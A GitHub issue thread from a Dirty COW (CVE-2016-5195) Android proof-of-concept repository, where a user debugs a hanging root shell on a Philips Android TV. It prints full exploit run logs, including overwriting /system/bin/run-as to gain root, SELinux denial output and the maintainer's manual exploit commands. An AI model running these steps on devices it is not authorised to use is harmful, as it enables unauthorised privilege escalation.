search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

Android TV Shell Hang #43

Closed uintdev closed 7 years ago

uintdev commented 7 years ago

Issue: After successfully exploiting, I am taken to the shell but if I press enter (doesn't matter what the command is), it kind of hangs. You could press the enter key as much as you want and it would go to the next line each time but it looks (visually) as if it's still waiting for output infinitely with the blinking cursor. Using CTRL+C is one way of getting out of the entire thing. I had tested the reboot command but that did nothing whatsoever. The actual unit was responsive the entire time. So nothing like kernel panics ended up happening (unlike half of the time with KingRoot).

System information:

Model: 40PUT6400/12 - Philips - Developed by TP Vision
Product ID: QM152E
Security Patch Date: 2016-07-01
Android Version: 5.1.1 (22 SDK)
CPU: Cortex-A17 (armeabi-v7a, 32 bit)
Kernel Version: 3.10.27 (build_ci@inblrlx047) (gcc version 4.8.2 20131014 (prerelease) (Linaro GCC 4.8-2013.10)) #1 SMP PREEMPT Fri Oct 7 11:45:11 IST 2016

MAKE TEST:

user@hostname:~/Desktop/CVE-2016-5195-master$ make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
100 KB/s (13784 bytes in 0.134s)
adb push test.sh /data/local/tmp/test.sh
11 KB/s (367 bytes in 0.031s)
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell    shell          18 2016-12-30 19:22 test
-rwxrwxrwx shell    shell         367 2016-12-19 14:06 test.sh
-r--r--r-- shell    shell          18 2016-12-30 19:22 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/test /data/local/tmp/test2
[*] size 18
[*] mmap 0xb6eda000
[*] currently 0xb6eda000=72756f79
[*] madvise = 0xb6eda000 18
[*] madvise = 0 59449
[*] /proc/self/mem 93150 5175
[*] exploited 0xb6eda000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
vulnerable!!!!!!!
adb shell 'cat /data/local/tmp/test2' | xxd
00000000: 7675 6c6e 6572 6162 6c65 2121 2121 2121  vulnerable!!!!!!
00000010: 210d 0a                                  !..

MAKE ROOT:

user@hostname:~/Desktop/CVE-2016-5195-master$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
make[1]: Entering directory '/home/user/Desktop/CVE-2016-5195-master'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/user/Desktop/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
111 KB/s (13784 bytes in 0.121s)
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
54 KB/s (5544 bytes in 0.100s)
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6ffffffe arg 0x630
WARNING: linker: /data/local/tmp/dcow: unused DT entry: type 0x6fffffff arg 0x1
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (9444) differ

[*] size 5544
[*] mmap 0xb6e7d000
[*] currently 0xb6e7d000=464c457f
[*] madvise = 0xb6e7d000 5544
[*] madvise = 0 460
[*] /proc/self/mem 205128 37
[*] exploited 0xb6e7d000=464c457f
adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x63c
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x2
uid /system/bin/run-as 2000
uid 0
0 u:r:runas:s0
context 0 u:r:shell:s0
root@philips_MT5593FHT_EU:/ #
timwr commented 7 years ago

Interesting. Do you get any SE Linux avc: denied in adb logcat. E.g: adb logcat | grep avc ?

uintdev commented 7 years ago

It returns the following:

W/adbd    ( 4943): type=1400 audit(0.0:23): avc: denied { read } for name="selinux_version" dev="mmcblk0p7" ino=168006 scontext=u:r:adbd:s0 tcontext=u:object_r:security_file:s0 tclass=file permissive=0
W/run-as  ( 4950): type=1400 audit(0.0:24): avc: denied { getattr } for path="/dev/pts/0" dev="devpts" ino=3 scontext=u:r:runas:s0 tcontext=u:object_r:devpts:s0 tclass=chr_file permissive=0
W/run-as  ( 4950): type=1400 audit(0.0:25): avc: denied { use } for path="socket:[55996]" dev="sockfs" ino=55996 scontext=u:r:shell:s0 tcontext=u:r:runas:s0 tclass=fd permissive=0

SELinux strikes again..

timwr commented 7 years ago

Sorry for the delay. I guess you could try what is outlined here: https://github.com/timwr/CVE-2016-5195/issues/47 e.g don't use the Makefile and just run the commands manually:

adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
adb shell
/system/bin/run-as
uintdev commented 7 years ago

That did the trick. Now it is in the same situation as issue #47 (context is 'u:r:​shell​:s0'). That's progress.